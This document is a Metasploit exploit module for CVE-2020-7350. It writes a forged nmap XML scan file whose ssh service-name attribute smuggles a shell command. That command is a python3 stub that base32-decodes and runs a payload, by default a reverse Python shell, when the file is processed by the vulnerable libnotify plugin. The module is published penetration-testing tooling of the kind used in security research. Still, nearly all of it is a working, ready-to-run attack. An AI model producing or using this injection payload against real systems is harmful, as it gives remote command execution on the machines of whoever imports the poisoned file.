##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module for CVE-2020-7350: produces an nmap-style XML results
# document that carries a command payload inside a port's `service name`
# attribute. Per the module description the libnotify plugin in Metasploit
# 5.0.79 and earlier is affected (see rapid7/metasploit-framework issue 13026);
# the only artifact this module creates is the file named by FILENAME.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata and the FILENAME option.
  #
  # @param info [Hash] module info supplied by the framework
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
      'Description' => %q{
        This module exploits a shell command injection vulnerability in the
        libnotify plugin. This vulnerability affects Metasploit versions
        5.0.79 and earlier.
      },
      'DisclosureDate' => '2020-03-04',
      'License' => GPL_LICENSE,
      'Author' => [
        'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
      ],
      'References' => [
        ['CVE', '2020-7350'],
        ['URL', 'https://github.com/rapid7/metasploit-framework/issues/13026']
      ],
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Payload' => {
        'DisableNops' => true
      },
      'DefaultOptions' => {
        'PAYLOAD' => 'cmd/unix/reverse_python'
      },
      'Targets' => [['Automatic', {}]],
      'Privileged' => false,
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        # The generated XML file is the on-disk artifact.
        'SideEffects' => [ARTIFACTS_ON_DISK],
        'Reliability' => [UNRELIABLE_SESSION]
      }
    )
    super(module_info)

    register_options(
      [
        # Output name for the generated document; defaults to scan.xml.
        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml'])
      ]
    )
  end

  # Builds the XML document and writes it out through the FILEFORMAT mixin.
  # The document is rendered before the status line so that any failure in
  # payload generation surfaces before a "Writing" message is printed.
  def exploit
    document = nmap_xml
    print_status("Writing xml file: #{datastore['FILENAME']}")
    file_create(document)
  end

  private

  # Renders the nmap XML document. The encoded payload is base32-encoded
  # before interpolation so that only alphanumerics and `=` are placed in the
  # attribute value; the embedded python3 stub decodes it at run time. The
  # `&quot;` / `&amp;` entities are left for the XML parser to decode.
  #
  # @return [String] the complete XML document, newline-terminated
  def nmap_xml
    encoded = Rex::Text.encode_base32(payload.encoded)
    <<~XML
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE nmaprun>
      <nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar  6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
      <host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
      <address addr="192.168.20.121" addrtype="ipv4"/>
      <hostnames>
      </hostnames>
      <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'#{encoded}'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port>
      </ports>
      <times srtt="6174" rttvar="435" to="100000"/>
      </host>
      <runstats><finished time="1583503480" timestr="Fri Mar  6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar  6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
      </runstats>
      </nmaprun>
    XML
  end
end
